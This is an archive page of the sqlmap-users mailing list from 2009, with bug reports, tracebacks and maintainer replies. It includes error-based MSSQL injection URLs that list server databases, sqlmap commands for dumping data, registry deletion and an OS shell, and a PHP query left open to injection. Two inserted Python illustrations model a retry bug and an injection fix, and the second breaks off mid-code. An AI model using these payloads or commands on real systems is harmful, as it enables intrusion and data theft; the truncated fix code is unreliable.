sqlmap-users Mailing List for sqlmap (Page 134)
From: Bernardo D. A. G. <ber...@gm...> - 2009-12-21 11:35:55

sqlmap supports string injections, but not with the following error-based payload. It will come in the long run.

Cheers,
B

On Sun, Dec 6, 2009 at 15:55, One Time <one...@ym...> wrote:
> Hi,
> Does sqlmap support string injections?
> I'm asking this because I'm testing sqlmap on my company site (ASP + MSSQL 2000) which is vulnerable to SQL injection.
>
> Example:
> www.xyz.com/default.asp?pag=anypage.asp
> "pag" is the injectable parameter
>
> I'm able to successfully enumerate users and databases using sqlmap only via blind SQL injection because for some reason other supported SQL injection methods fail with the error: "[WARNING] for some reasons it was not possible to retrieve the query output through inband SQL injection technique, sqlmap is going blind"
>
> Using other scanners I noticed that it is possible to dump data (for example databases listing) using queries like these:
> www.xyz.com/default.asp?pag=anypage.asp' and 0=(select top 1 cast([name] as nvarchar(256))+char(94)+cast([filename] as nvarchar(256)) from(select top 27 dbid,name,filename from [master].[dbo].[sysdatabases] order by [dbid]) t order by [dbid] desc)--
> www.xyz.com/default.asp?pag=anypage.asp' and 0=(select top 1 cast([name] as nvarchar(256))+char(94)+cast([filename] as nvarchar(256)) from(select top 28 dbid,name,filename from [master].[dbo].[sysdatabases] order by [dbid]) t order by [dbid] desc)--
> www.xyz.com/default.asp?pag=anypage.asp' and 0=(select top 1 cast([name] as nvarchar(256))+char(94)+cast([filename] as nvarchar(256)) from(select top 29 dbid,name,filename from [master].[dbo].[sysdatabases] order by [dbid]) t order by [dbid] desc)--
> etc.
> This method is really fast (behind proxy too) compared to the extreme slowness of a blind SQL injection.
>
> Why doesn't sqlmap detect this type of injection?
>
> Thank you
> Regards
>
> ------------------------------------------------------------------------------
> Join us December 9, 2009 for the Red Hat Virtual Experience,
> a free event focused on virtualization and cloud computing.
> Attend in-depth sessions from your desk. Your couch. Anywhere.
> http://p.sf.net/sfu/redhat-sfdev2dev
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>

--
Bernardo Damele A. G.
E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F
From: Bernardo D. A. G. <ber...@gm...> - 2009-12-21 11:22:24

Fixed and committed. Thanks for reporting.

Cheers,
Bernardo

On Wed, Dec 9, 2009 at 03:22, pacman730 <pac...@us...> wrote:
> Hi sqlmap team,
>
> I found a bug in the getPage function in Connect class. The bug occurs when there is a timeout exception or other types.
> In this case the function is gonna call on itself (if retriesCout < conf.retires), but with a changed url variable.
> So in this case it's gonna connect to:
> http://www.test.com/list.php?id=354%20sqlinjectionhere?id=354%20sqlinjectionhere
>
> You can't see this with -v 3 because requestMsg is how it should be, I found it with Wireshark.
> To fix this you need to change lines 90, 92, 111 and 130.
> This is how I did it:
>
> [...]
> line 88     if direct:
>                 if "?" in url:
>                     url2, params = url.split("?")
>                     params = urlencode(params).replace("%%", "%")
>                     url2 = "%s?%s" % (url2, params)
>                     requestMsg += "?%s" % params
> [...]
> line 105    else:
>                 if conf.parameters.has_key("GET") and not get:
>                     get = conf.parameters["GET"]
>
>                 if get:
>                     get = urlencode(get).replace("%%", "%")
>                     url2 = "%s?%s" % (url, get)
>                     requestMsg += "?%s" % get
> [...]
> line 127    try:
>                 # Perform HTTP request
>                 headers = forgeHeaders(cookie, ua)
>                 req = urllib2.Request(url2, post, headers)
>                 conn = urllib2.urlopen(req)
>
> I just made a new var url2 to not change url and send it back modified.
>
> Or maybe you can change line 216 to:
>                 return Connect.__getPageProxy(kwargs)
> but I haven't tried it because I was too busy and I'm kinda new to Python.
>
> Have a nice day,
>
> pacman730

--
Bernardo Damele A. G.
From: Bernardo D. A. G. <ber...@gm...> - 2009-12-21 11:07:12

Try with sqlmap latest development version from subversion and preferably with Python 2.6.

On Mon, Dec 21, 2009 at 09:24, Kerem Gunes <ker...@gm...> wrote:
> sqlmap version: 0.7
> Python version: 2.5.1
> Operating system: darwin
> Traceback (most recent call last):
>   File "./sqlmap.py", line 84, in main
>     start()
>   File "/Users/h4x/pwn/sqlmap-0.7/lib/controller/controller.py", line 263, in start
>     action()
>   File "/Users/h4x/pwn/sqlmap-0.7/lib/controller/action.py", line 140, in action
>     conf.dbmsHandler.osShell()
>   File "/Users/h4x/pwn/sqlmap-0.7/plugins/generic/takeover.py", line 295, in osShell
>     backdoorUrl = self.__webBackdoorInit()
>   File "/Users/h4x/pwn/sqlmap-0.7/plugins/generic/takeover.py", line 187, in __webBackdoorInit
>     uplPage, _ = Request.getPage(url=uploaderUrl, direct=True)
>   File "/Users/h4x/pwn/sqlmap-0.7/lib/request/connect.py", line 131, in getPage
>     conn = urllib2.urlopen(req)
>   File "/System/Library/Frameworks/Python.framework/Versions/2.5/lib/python2.5/urllib2.py", line 121, in urlopen
>     return _opener.open(url, data)
>   File "/System/Library/Frameworks/Python.framework/Versions/2.5/lib/python2.5/urllib2.py", line 374, in open
>     response = self._open(req, data)
>   File "/System/Library/Frameworks/Python.framework/Versions/2.5/lib/python2.5/urllib2.py", line 392, in _open
>     '_open', req)
>   File "/System/Library/Frameworks/Python.framework/Versions/2.5/lib/python2.5/urllib2.py", line 353, in _call_chain
>     result = func(*args)
>   File "/System/Library/Frameworks/Python.framework/Versions/2.5/lib/python2.5/urllib2.py", line 1100, in http_open
>     return self.do_open(httplib.HTTPConnection, req)
>   File "/System/Library/Frameworks/Python.framework/Versions/2.5/lib/python2.5/urllib2.py", line 1057, in do_open
>     h = http_class(host) # will parse host:port
>   File "/System/Library/Frameworks/Python.framework/Versions/2.5/lib/python2.5/httplib.py", line 635, in __init__
>     self._set_hostport(host, port)
>   File "/System/Library/Frameworks/Python.framework/Versions/2.5/lib/python2.5/httplib.py", line 647, in _set_hostport
>     raise InvalidURL("nonnumeric port: '%s'" % host[i+1:])
> InvalidURL: nonnumeric port: ''
>

--
Bernardo Damele A. G.
From: Bernardo D. A. G. <ber...@gm...> - 2009-12-21 11:06:05

Fixed and committed. Thanks for reporting.

Cheers,
Bernardo

On Sat, Dec 19, 2009 at 13:42, Roberto Castrogiovanni <cas...@gm...> wrote:
> Hi,
> here is a bug in sqlmap
>
> ./sqlmap.py --proxy "http://localhost:8118" -u "http://www.xxx.xx?ID=966" --user-agent="-" --reg-del
>
> sqlmap version: 0.8-rc2
> Python version: 2.5.4
> Operating system: linux2
> Traceback (most recent call last):
>   File "./sqlmap.py", line 84, in main
>     start()
>   File "/home/user/sicurezza/sqlmap/lib/controller/controller.py", line 263, in start
>     action()
>   File "/home/user/sicurezza/sqlmap/lib/controller/action.py", line 163, in action
>     conf.dbmsHandler.regDel()
>   File "/home/user/sicurezza/sqlmap/plugins/generic/takeover.py", line 557, in regDel
>     regVal = readInput(msg, default=default)
> NameError: global name 'default' is not defined
>
> [*] shutting down at: 14:38:35
>
> Thank you in advance
>
> Roberto
> --
> Computers are like air-conditioners:
> they stop working properly
> when you open Windows
>

--
Bernardo Damele A. G.
From: Kerem G. <ker...@gm...> - 2009-12-21 09:24:15

sqlmap version: 0.7
Python version: 2.5.1
Operating system: darwin
Traceback (most recent call last):
  File "./sqlmap.py", line 84, in main
    start()
  File "/Users/h4x/pwn/sqlmap-0.7/lib/controller/controller.py", line 263, in start
    action()
  File "/Users/h4x/pwn/sqlmap-0.7/lib/controller/action.py", line 140, in action
    conf.dbmsHandler.osShell()
  File "/Users/h4x/pwn/sqlmap-0.7/plugins/generic/takeover.py", line 295, in osShell
    backdoorUrl = self.__webBackdoorInit()
  File "/Users/h4x/pwn/sqlmap-0.7/plugins/generic/takeover.py", line 187, in __webBackdoorInit
    uplPage, _ = Request.getPage(url=uploaderUrl, direct=True)
  File "/Users/h4x/pwn/sqlmap-0.7/lib/request/connect.py", line 131, in getPage
    conn = urllib2.urlopen(req)
  File "/System/Library/Frameworks/Python.framework/Versions/2.5/lib/python2.5/urllib2.py", line 121, in urlopen
    return _opener.open(url, data)
  File "/System/Library/Frameworks/Python.framework/Versions/2.5/lib/python2.5/urllib2.py", line 374, in open
    response = self._open(req, data)
  File "/System/Library/Frameworks/Python.framework/Versions/2.5/lib/python2.5/urllib2.py", line 392, in _open
    '_open', req)
  File "/System/Library/Frameworks/Python.framework/Versions/2.5/lib/python2.5/urllib2.py", line 353, in _call_chain
    result = func(*args)
  File "/System/Library/Frameworks/Python.framework/Versions/2.5/lib/python2.5/urllib2.py", line 1100, in http_open
    return self.do_open(httplib.HTTPConnection, req)
  File "/System/Library/Frameworks/Python.framework/Versions/2.5/lib/python2.5/urllib2.py", line 1057, in do_open
    h = http_class(host) # will parse host:port
  File "/System/Library/Frameworks/Python.framework/Versions/2.5/lib/python2.5/httplib.py", line 635, in __init__
    self._set_hostport(host, port)
  File "/System/Library/Frameworks/Python.framework/Versions/2.5/lib/python2.5/httplib.py", line 647, in _set_hostport
    raise InvalidURL("nonnumeric port: '%s'" % host[i+1:])
InvalidURL: nonnumeric port: ''
From: Roberto C. <cas...@gm...> - 2009-12-19 13:49:09

Hi,
here is a bug in sqlmap

./sqlmap.py --proxy "http://localhost:8118" -u "http://www.xxx.xx?ID=966" --user-agent="-" --reg-del

sqlmap version: 0.8-rc2
Python version: 2.5.4
Operating system: linux2
Traceback (most recent call last):
  File "./sqlmap.py", line 84, in main
    start()
  File "/home/user/sicurezza/sqlmap/lib/controller/controller.py", line 263, in start
    action()
  File "/home/user/sicurezza/sqlmap/lib/controller/action.py", line 163, in action
    conf.dbmsHandler.regDel()
  File "/home/user/sicurezza/sqlmap/plugins/generic/takeover.py", line 557, in regDel
    regVal = readInput(msg, default=default)
NameError: global name 'default' is not defined

[*] shutting down at: 14:38:35

Thank you in advance

Roberto
--
Computers are like air-conditioners:
they stop working properly
when you open Windows
From: Sarah K. <sk...@gm...> - 2009-12-16 05:06:29

sk...@gm...
From: Bernardo D. A. G. <ber...@gm...> - 2009-12-15 13:59:38

Hi,

A few months ago sqlmap passed its 3rd year of virtual life. I would like to personally thank Daniele Bellucci for starting the project back in July 2006 and letting me succeed him in sqlmap development since September 2006.

During the last 12 months, sqlmap has seen a lot of improvements in (post-)exploitation functionalities[1][2][3], ranging from underlying file system read and write access to database buffer overflow exploitation with memory protection bypass, passing by UDF injection to execute Metasploit payload in-memory or via payload stager executable, and more[4] (thanks to Guido Landi for helping me out with some of these features).

I've received tons of great feedback (dumb questions too) privately by email, face to face and via this mailing list from you all and I really appreciate it, thank you[5]! Sorry if I did not get back right away, I might have missed your email: send it again privately and I will try to get back promptly.

The media/blogger attention to the tool and to SQL injection as a vector not only to expose sensible data but also to own the whole underlying system and internal network in general has been higher in the last 12 months. Personally speaking, since my talk at Black Hat Europe[6][7][8] and the recent Corporate websites ownage[9].

Surprisingly sqlmap is the most downloaded SQL injection tool on SourceForge[10]; however, I've no statistics about the downloads from third-party mirrors so this information does *not* count globally. Also, a search on Google for "sql injection"[11] places sqlmap at the 21st place, first tool of its category to be mentioned: good to see that many whitepapers and tutorials showed up first, symptom maybe that many people do care about learning how it works before just firing up a tool.

Now I see sqlmap development for 2010 going in two directions:

1. I would like to brainstorm with *you* then rewrite from scratch the detection engine; it's the weak part of sqlmap in my opinion, it upsets many users, requires reading and understanding of the user's manual for not-straightforward SQL injections and, sadly, is not as mature as some other tools (very few though[12] ;)). I've some thoughts about it and will share them soon. Please, do reply to this point if you've anything to say either publicly or privately, feel free to get in touch also via Jabber if you prefer. All comments, suggestions and critics will be answered, taken into account and eventually summarized afterwards in an email open to the mailing list.

2. It would be great if someone joins actively the development team (me, sigh..) to maintain the code, refactor it a bit, document it to ease new developers to code over it, fix bugs and add new features. I've a list of about 60 unique items in the ticketing system, so there's plenty of work to do, time permitting. Yes, you've got it right, I am looking for help as in code: software engineers experienced in Python development (no, I won't follow the Ruby hype so please don't ask for a change of technology), so if you ever thought it would be cool to join sqlmap development, now it's your time to do so. I can provide you with write access to a personal branch on the sqlmap subversion repository, access to the project management interface (this includes the ticketing system) and if you show up in the London area we can meet for a beer too or, if you prefer, a more typical English tea! ;)

I hope this will bring a lot of good ideas and I am open to read all your thoughts.

Thanks if you spent your time to the end of this email.

[1] http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf
[2] http://www.slideshare.net/inquis/advanced-sql-injection-to-operating-system-full-control-slides
[3] http://www.slideshare.net/inquis/expanding-the-control-over-the-operating-system-from-the-database
[4] https://svn.sqlmap.org/sqlmap/trunk/sqlmap/doc/ChangeLog
[5] https://svn.sqlmap.org/sqlmap/trunk/sqlmap/doc/THANKS
[6] http://www.darkreading.com/security/vulnerabilities/showArticle.jhtml?articleID=216402297
[7] http://www.theregister.co.uk/2009/04/02/new_sql_injection_attack/
[8] http://www.h-online.com/security/SQL-injection-reloaded-access-to-the-operating-system--/news/113095
[9] http://www.theregister.co.uk/2009/11/23/symantec_website_security_snafu/
[10] http://sourceforge.net/search/?words=%22sql+injection%22&sort=num_downloads&sortdir=desc&offset=0&type_of_search=soft&pmode=0&form_cat=18
[11] http://www.google.com/search?hl=en&q=sql+injection&start=20&sa=N
[12] http://code.google.com/p/sqlibench/

Cheers,

--
Bernardo Damele A. G.
From: pacman730 <pac...@us...> - 2009-12-09 03:50:18

Hi sqlmap team,

I found a bug in the getPage function in Connect class. The bug occurs when there is a timeout exception or other types.
In this case the function is gonna call on itself (if retriesCout < conf.retires), but with a changed url variable.
So in this case it's gonna connect to:
http://www.test.com/list.php?id=354%20sqlinjectionhere?id=354%20sqlinjectionhere

You can't see this with -v 3 because requestMsg is how it should be, I found it with Wireshark.
To fix this you need to change lines 90, 92, 111 and 130.
This is how I did it:

[...]
line 88     if direct:
                if "?" in url:
                    url2, params = url.split("?")
                    params = urlencode(params).replace("%%", "%")
                    url2 = "%s?%s" % (url2, params)
                    requestMsg += "?%s" % params
[...]
line 105    else:
                if conf.parameters.has_key("GET") and not get:
                    get = conf.parameters["GET"]

                if get:
                    get = urlencode(get).replace("%%", "%")
                    url2 = "%s?%s" % (url, get)
                    requestMsg += "?%s" % get
[...]
line 127    try:
                # Perform HTTP request
                headers = forgeHeaders(cookie, ua)
                req = urllib2.Request(url2, post, headers)
                conn = urllib2.urlopen(req)

I just made a new var url2 to not change url and send it back modified.

Or maybe you can change line 216 to:
                return Connect.__getPageProxy(kwargs)
but I haven't tried it because I was too busy and I'm kinda new to Python.

Have a nice day,

pacman730
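The retry defect reported above, modelled as an added example (not sqlmap's code): a request function that rebinds its `url` argument before a recursive retry, beside the variant that keeps the request URL in a separate variable as the fix does. `FlakyTransport`, `get_page_buggy`, `get_page_fixed` and `RetryExhausted` are constructed names, and the transport stands in for `urllib2.urlopen` so the URLs that would go on the wire can be inspected offline.

```python
"""Model of the retry/URL-mutation bug from the getPage report.

Constructed for illustration; none of these names exist in sqlmap.
"""
from urllib.parse import quote


class RetryExhausted(Exception):
    """Raised when every retry attempt has failed."""


class FlakyTransport:
    """Stand-in for urllib2.urlopen: raises TimeoutError for the first
    `failures` calls, then succeeds. Records every URL it was asked to
    open, which is what a packet capture would show."""

    def __init__(self, failures):
        self.failures = failures
        self.requested = []

    def open(self, url):
        self.requested.append(url)
        if len(self.requested) <= self.failures:
            raise TimeoutError("simulated timeout")
        return "<html>ok</html>"


def encode_query(get):
    # Percent-encode the query string but keep '=', '&' and any existing '%'.
    return quote(get, safe="=&%")


def get_page_buggy(transport, url, get=None, retries=3, _attempt=0):
    """Reported behaviour: `url` is rebound to include the query string and
    that rebound value is what the recursive retry receives, so each retry
    appends the parameters once more."""
    if get:
        url = "%s?%s" % (url, encode_query(get))
    try:
        return transport.open(url)
    except TimeoutError:
        if _attempt < retries:
            return get_page_buggy(transport, url, get, retries, _attempt + 1)
        raise RetryExhausted(url)


def get_page_fixed(transport, url, get=None, retries=3, _attempt=0):
    """The fix: build the request URL in its own variable (url2) so the
    caller's `url` is passed unchanged to the retry."""
    url2 = url
    if get:
        url2 = "%s?%s" % (url, encode_query(get))
    try:
        return transport.open(url2)
    except TimeoutError:
        if _attempt < retries:
            return get_page_fixed(transport, url, get, retries, _attempt + 1)
        raise RetryExhausted(url2)


def requested_urls(fetch, failures=2):
    """Run `fetch` against a transport that times out `failures` times and
    return the URLs that were actually requested, in order."""
    transport = FlakyTransport(failures)
    fetch(transport, "http://www.test.com/list.php", get="id=354 test")
    return transport.requested


if __name__ == "__main__":
    for name, fetch in (("buggy", get_page_buggy), ("fixed", get_page_fixed)):
        print(name)
        for requested in requested_urls(fetch):
            print("   ", requested)
```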
From: One T. <one...@ym...> - 2009-12-06 15:56:09

Hi,
Does sqlmap support string injections?
I'm asking this because I'm testing sqlmap on my company site (ASP + MSSQL 2000) which is vulnerable to SQL injection.

Example:
www.xyz.com/default.asp?pag=anypage.asp
"pag" is the injectable parameter

I'm able to successfully enumerate users and databases using sqlmap only via blind SQL injection because for some reason other supported SQL injection methods fail with the error: "[WARNING] for some reasons it was not possible to retrieve the query output through inband SQL injection technique, sqlmap is going blind"

Using other scanners I noticed that it is possible to dump data (for example databases listing) using queries like these:
www.xyz.com/default.asp?pag=anypage.asp' and 0=(select top 1 cast([name] as nvarchar(256))+char(94)+cast([filename] as nvarchar(256)) from(select top 27 dbid,name,filename from [master].[dbo].[sysdatabases] order by [dbid]) t order by [dbid] desc)--
www.xyz.com/default.asp?pag=anypage.asp' and 0=(select top 1 cast([name] as nvarchar(256))+char(94)+cast([filename] as nvarchar(256)) from(select top 28 dbid,name,filename from [master].[dbo].[sysdatabases] order by [dbid]) t order by [dbid] desc)--
www.xyz.com/default.asp?pag=anypage.asp' and 0=(select top 1 cast([name] as nvarchar(256))+char(94)+cast([filename] as nvarchar(256)) from(select top 29 dbid,name,filename from [master].[dbo].[sysdatabases] order by [dbid]) t order by [dbid] desc)--
etc.
This method is really fast (behind proxy too) compared to the extreme slowness of a blind SQL injection.

Why doesn't sqlmap detect this type of injection?

Thank you
Regards
From: Bernardo D. A. G. <ber...@gm...> - 2009-12-04 09:35:51

Hi,

Due to very low traffic on the sqlmap-devel mailing list, I've decided to merge it into sqlmap-users. All users that were registered to the old development mailing list are now into this one. Don't worry, it's a low traffic mailing list too as you can see from the archive.

Cheers,

--
Bernardo Damele A. G.
From: Bernardo D. A. G. <ber...@gm...> - 2009-12-04 00:33:57

Hi Tim,

What is the url you provided sqlmap with? Did you manually confirm that the page content differs when true and false conditions are injected for the zahl2 parameter?

Cheers,
Bernardo

On Tue, Nov 17, 2009 at 11:03, Tim Jordans <ma...@ti...> wrote:
> Hello,
> my name is Tim Jordans.
>
> First of all I have tested sqlmap and thanks for the tool.
>
> I stumbled upon a problem. In the following PHP script sqlmap did not find any injection:
>
> mysql_query('SELECT * FROM tb_apotheke WHERE AID="'.
>     mysql_real_escape_string($_REQUEST['zahl1']).'" OR AID='.
>     $_REQUEST['zahl2'].' OR AID="'.
>     mysql_real_escape_string($_REQUEST['zahl3']).'"'
> );
>
> Although the middle parameter is not escaped sqlmap can't inject. I was wondering if the statement is not insecure or is this not part of the sqlmap testing routine.
>
> I hope that someone could help me with this problem.
>
> greetings
> tim jordans
>

--
Bernardo Damele A. G.
From: Bernardo D. A. G. <ber...@gm...> - 2009-12-03 23:15:09

Hi Superman,

I can't reproduce this bug on my test environment. Can you please edit ./lib/techniques/blind/inference.py adding before line 126 the following:

    print "expressionUnescaped: " + expressionUnescaped + " idx: " + str(idx) + " posValue: " + str(posValue)

and get back with the whole sqlmap output from the beginning?

Cheers,
Bernardo

> forgedPayload = payload % (expressionUnescaped, idx, posValue)

On Tue, Nov 17, 2009 at 19:18, Clark Kent <wo...@gm...> wrote:
>
> Command
> sqlmap.py -u "http://vulnerable.com/test.aspx?page=95937&id=95937" -p "id" -v3 --dbs --string "hidden"
>
> Cookie: ASP.NET_SessionId=3jnjn345cxjtmequ2g0qqg45;B100Serverpoolcookie=3841711232.1.3728877696.2466886620
> Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
> User-agent: sqlmap/0.8-rc1 (http://sqlmap.sourceforge.net)
> Connection: close
>
> [11:13:14] [INFO] the back-end DBMS is Microsoft SQL Server
> web server operating system: Windows 2003 or 2008
> web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 1.1.4322
> back-end DBMS: Microsoft SQL Server 2005
>
> [11:13:14] [INFO] fetching database names
> [11:13:14] [INFO] fetching number of databases
> [11:13:14] [DEBUG] query: SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases
> [11:13:14] [ERROR] unhandled exception in sqlmap/0.8-rc1, please copy the command line and the following text and send by e-mail to sql...@li.... The developer will fix it as soon as possible:
> sqlmap version: 0.8-rc1
> Python version: 2.6.4
> Operating system: linux2
> Traceback (most recent call last):
>   File "./sqlmap.py", line 84, in main
>     start()
>   File "/home/blackcatz/Desktop/sqlmap/sqlmap/lib/controller/controller.py", line 263, in start
>     action()
>   File "/home/blackcatz/Desktop/sqlmap/sqlmap/lib/controller/action.py", line 108, in action
>     dumper.lister("available databases", conf.dbmsHandler.getDbs())
>   File "/home/blackcatz/Desktop/sqlmap/sqlmap/plugins/generic/enumeration.py", line 661, in getDbs
>     count = inject.getValue(query, inband=False, expected="int", charsetType=2)
>   File "/home/blackcatz/Desktop/sqlmap/sqlmap/lib/request/inject.py", line 378, in getValue
>     value = __goInferenceProxy(expression, fromUser, expected, batch, resumeValue, unpack, charsetType, firstChar, lastChar)
>   File "/home/blackcatz/Desktop/sqlmap/sqlmap/lib/request/inject.py", line 308, in __goInferenceProxy
>     outputs = __goInferenceFields(expression, expressionFields, expressionFieldsList, payload, expected, resumeValue=resumeValue, charsetType=charsetType, firstChar=firstChar, lastChar=lastChar)
>   File "/home/blackcatz/Desktop/sqlmap/sqlmap/lib/request/inject.py", line 99, in __goInferenceFields
>     output = __goInference(payload, expressionReplaced, charsetType, firstChar, lastChar)
>   File "/home/blackcatz/Desktop/sqlmap/sqlmap/lib/request/inject.py", line 58, in __goInference
>     count, value = bisection(payload, expression, length, charsetType, firstChar, lastChar)
>   File "/home/blackcatz/Desktop/sqlmap/sqlmap/lib/techniques/blind/inference.py", line 253, in bisection
>     val = getChar(index, asciiTbl)
>   File "/home/blackcatz/Desktop/sqlmap/sqlmap/lib/techniques/blind/inference.py", line 126, in getChar
>     forgedPayload = payload % (expressionUnescaped, idx, posValue)
> TypeError: not enough arguments for format string

--
Bernardo Damele A. G.
From: Bernardo D. A. G. <ber...@gm...> - 2009-12-01 10:30:03

Google changed the source code of the results page, I will adapt sqlmap soon to parse the new HTTP response.

Regards,
Bernardo

On Mon, Nov 30, 2009 at 06:46, FS Inc. <fs...@ho...> wrote:
> Hi when I issue this command, this is what happens always.
>
> ----
> sqlmap --dump-all -g "site:mytestsite.org ext:asp"
>
> sqlmap/0.7
> by Bernardo Damele A. G. <ber...@gm...>
>
> [*] starting at: 02:41:20
>
> [02:41:20] [INFO] first request to Google to get the session cookie
> [02:41:39] [ERROR] unable to find results for your Google dork expression
>
> [*] shutting down at: 02:41:39
> ----
>
> I replaced my own website name with mytestsite.org to protect the innocent.
>
> If I go to Google and type directly into the search box site:mytestsite.org ext:asp I get a list of the asp pages of my website.
>
> Is there something I am missing?
>
> Thanks.
>

--
Bernardo Damele A. G.
From: FS I. <fs...@ho...> - 2009-11-30 06:46:32

Hi when I issue this command, this is what happens always.

----
sqlmap --dump-all -g "site:mytestsite.org ext:asp"

sqlmap/0.7
by Bernardo Damele A. G. <ber...@gm...>

[*] starting at: 02:41:20

[02:41:20] [INFO] first request to Google to get the session cookie
[02:41:39] [ERROR] unable to find results for your Google dork expression

[*] shutting down at: 02:41:39
----

I replaced my own website name with mytestsite.org to protect the innocent.

If I go to Google and type directly into the search box site:mytestsite.org ext:asp I get a list of the asp pages of my website.

Is there something I am missing?

Thanks.

_________________________________________________________________
Windows Live: Friends get your Flickr, Yelp, and Digg updates when they e-mail you.
http://www.microsoft.com/middleeast/windows/windowslive/see-it-in-action/social-network-basics.aspx?ocid=PID23461::T:WLMTAGL:ON:WL:en-xm:SI_SB_3:092010
From: Clark K. <wo...@gm...> - 2009-11-17 19:19:06

Command
sqlmap.py -u "http://vulnerable.com/test.aspx?page=95937&id=95937" -p "id" -v3 --dbs --string "hidden"

Cookie: ASP.NET_SessionId=3jnjn345cxjtmequ2g0qqg45;B100Serverpoolcookie=3841711232.1.3728877696.2466886620
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-agent: sqlmap/0.8-rc1 (http://sqlmap.sourceforge.net)
Connection: close

[11:13:14] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or 2008
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 1.1.4322
back-end DBMS: Microsoft SQL Server 2005

[11:13:14] [INFO] fetching database names
[11:13:14] [INFO] fetching number of databases
[11:13:14] [DEBUG] query: SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases
[11:13:14] [ERROR] unhandled exception in sqlmap/0.8-rc1, please copy the command line and the following text and send by e-mail to sql...@li.... The developer will fix it as soon as possible:
sqlmap version: 0.8-rc1
Python version: 2.6.4
Operating system: linux2
Traceback (most recent call last):
  File "./sqlmap.py", line 84, in main
    start()
  File "/home/blackcatz/Desktop/sqlmap/sqlmap/lib/controller/controller.py", line 263, in start
    action()
  File "/home/blackcatz/Desktop/sqlmap/sqlmap/lib/controller/action.py", line 108, in action
    dumper.lister("available databases", conf.dbmsHandler.getDbs())
  File "/home/blackcatz/Desktop/sqlmap/sqlmap/plugins/generic/enumeration.py", line 661, in getDbs
    count = inject.getValue(query, inband=False, expected="int", charsetType=2)
  File "/home/blackcatz/Desktop/sqlmap/sqlmap/lib/request/inject.py", line 378, in getValue
    value = __goInferenceProxy(expression, fromUser, expected, batch, resumeValue, unpack, charsetType, firstChar, lastChar)
  File "/home/blackcatz/Desktop/sqlmap/sqlmap/lib/request/inject.py", line 308, in __goInferenceProxy
    outputs = __goInferenceFields(expression, expressionFields, expressionFieldsList, payload, expected, resumeValue=resumeValue, charsetType=charsetType, firstChar=firstChar, lastChar=lastChar)
  File "/home/blackcatz/Desktop/sqlmap/sqlmap/lib/request/inject.py", line 99, in __goInferenceFields
    output = __goInference(payload, expressionReplaced, charsetType, firstChar, lastChar)
  File "/home/blackcatz/Desktop/sqlmap/sqlmap/lib/request/inject.py", line 58, in __goInference
    count, value = bisection(payload, expression, length, charsetType, firstChar, lastChar)
  File "/home/blackcatz/Desktop/sqlmap/sqlmap/lib/techniques/blind/inference.py", line 253, in bisection
    val = getChar(index, asciiTbl)
  File "/home/blackcatz/Desktop/sqlmap/sqlmap/lib/techniques/blind/inference.py", line 126, in getChar
    forgedPayload = payload % (expressionUnescaped, idx, posValue)
TypeError: not enough arguments for format string
From: Tim J. <ma...@ti...> - 2009-11-17 11:34:29
|
Hello, my name is Tim Jordans. First of all I have tested sqlmap and thanks for the tool. I stumbled upon a problem. In the following php-script sqlmap did not find any injection:

mysql_query('SELECT * FROM tb_apotheke WHERE AID="'. mysql_real_escape_string($_REQUEST['zahl1']).'" OR AID='. $_REQUEST['zahl2'].' OR AID="'. mysql_real_escape_string($_REQUEST['zahl3']).'"' );

Although the middle parameter is not escaped sqlmap can't inject. I was wondering if the statement is not insecure or is this not part of the sqlmap testing routine. I hope that someone could help me with this problem.

Greetings,
Tim Jordans |
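The statement from this message, rebuilt as an added example (not the poster's script) in Python against an in-memory SQLite table that stands in for the MySQL table tb_apotheke. The rows are constructed, single quotes replace the PHP double quotes, and escape_string is a minimal stand-in for mysql_real_escape_string using standard quote doubling. It shows that escaping only protects a value inside a quoted literal: zahl1 and zahl3 stay inert, the bare numeric zahl2 accepts arbitrary SQL, and the fix is integer validation plus a parameterized query.

```python
import sqlite3


def escape_string(value):
    # Stand-in for mysql_real_escape_string(): quote doubling, which is
    # only meaningful inside a single-quoted literal.
    return value.replace("'", "''")


def build_vulnerable_query(zahl1, zahl2, zahl3):
    # Mirrors the statement from the question: zahl1 and zahl3 are escaped
    # and quoted, zahl2 is concatenated bare into a numeric comparison, so
    # escaping cannot help it and any SQL is accepted there.
    return ("SELECT AID, name FROM tb_apotheke WHERE AID='" + escape_string(zahl1)
            + "' OR AID=" + zahl2
            + " OR AID='" + escape_string(zahl3) + "'")


def run_vulnerable(conn, zahl1, zahl2, zahl3):
    return conn.execute(build_vulnerable_query(zahl1, zahl2, zahl3)).fetchall()


def run_hardened(conn, zahl1, zahl2, zahl3):
    # Hardened form: validate the numeric input as an integer and bind every
    # value as a parameter, so no user input ever reaches the SQL text.
    try:
        aid2 = int(zahl2)
    except ValueError:
        raise ValueError("zahl2 must be an integer, got %r" % zahl2)
    sql = "SELECT AID, name FROM tb_apotheke WHERE AID=? OR AID=? OR AID=?"
    return conn.execute(sql, (zahl1, aid2, zahl3)).fetchall()


def make_db():
    # Constructed sample table; the names are placeholders.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tb_apotheke (AID INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO tb_apotheke VALUES (?, ?)",
                     [(1, "Apotheke A"), (2, "Apotheke B"), (3, "Apotheke C")])
    return conn


if __name__ == "__main__":
    db = make_db()
    print("normal:", run_vulnerable(db, "x", "1", "x"))
    print("bare numeric parameter abused:", run_vulnerable(db, "x", "0 OR 1=1", "x"))
    print("escaped quoted parameter stays inert:", run_vulnerable(db, "' OR 1=1 --", "0", "x"))
    print("hardened:", run_hardened(db, "x", "1", "x"))
    try:
        run_hardened(db, "x", "0 OR 1=1", "x")
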